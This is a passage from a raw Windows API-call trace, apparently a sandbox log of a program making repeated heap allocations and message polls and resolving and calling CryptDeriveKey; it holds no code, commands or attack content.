dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0260.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0260.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0260.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0260.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0260.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0260.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0260.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x24a9de0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0260.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0260.899] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0260.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0260.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0260.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0260.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0260.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2110 [0260.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0260.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0260.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0260.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0260.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0260.900] CryptDeriveKey (in: hProv=0xad31c0, Algid=0x6601, hBaseData=0xaa5860, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5920) returned 1 [0260.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0260.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0260.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0260.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0260.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0260.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0260.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0260.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0260.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0260.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0260.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0260.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0260.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0260.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0260.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0260.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0260.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0260.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0260.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0260.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0260.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0260.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0260.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0260.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0260.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0260.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0260.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0260.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0260.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0260.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0260.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0260.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0260.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0260.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0260.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0260.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0260.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0260.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0260.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0260.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0260.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0260.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0260.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0260.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0260.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0260.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0260.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0260.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0260.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0260.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0260.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0260.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0260.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0260.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0260.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0260.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0260.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0260.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0260.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0260.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0260.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0260.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0260.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0260.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0260.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0260.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0260.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0260.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0260.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0260.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0260.905] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0260.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2120 [0260.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0260.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0260.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0260.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0260.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0260.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0260.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0260.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0260.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0260.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0260.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0260.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0260.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0260.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0260.906] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0260.906] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0260.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0260.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2120 [0260.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0260.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0260.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0260.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0260.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0260.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0260.907] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0260.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0260.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0260.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0260.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0260.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0260.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0260.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0260.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0260.908] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0260.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0260.908] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0260.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0260.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0260.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0260.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0260.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0260.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0260.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0260.908] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.908] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0260.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0260.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0260.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0260.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0260.909] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.909] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0260.909] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0260.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0260.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0260.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0260.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0260.909] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0260.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0260.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0260.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0260.910] CryptDestroyHash (hHash=0xaa5860) returned 1 [0260.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0260.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0260.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0260.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0260.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0260.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0260.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0260.910] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0260.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0260.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0260.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0260.911] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.911] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.911] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.911] PeekMessageW 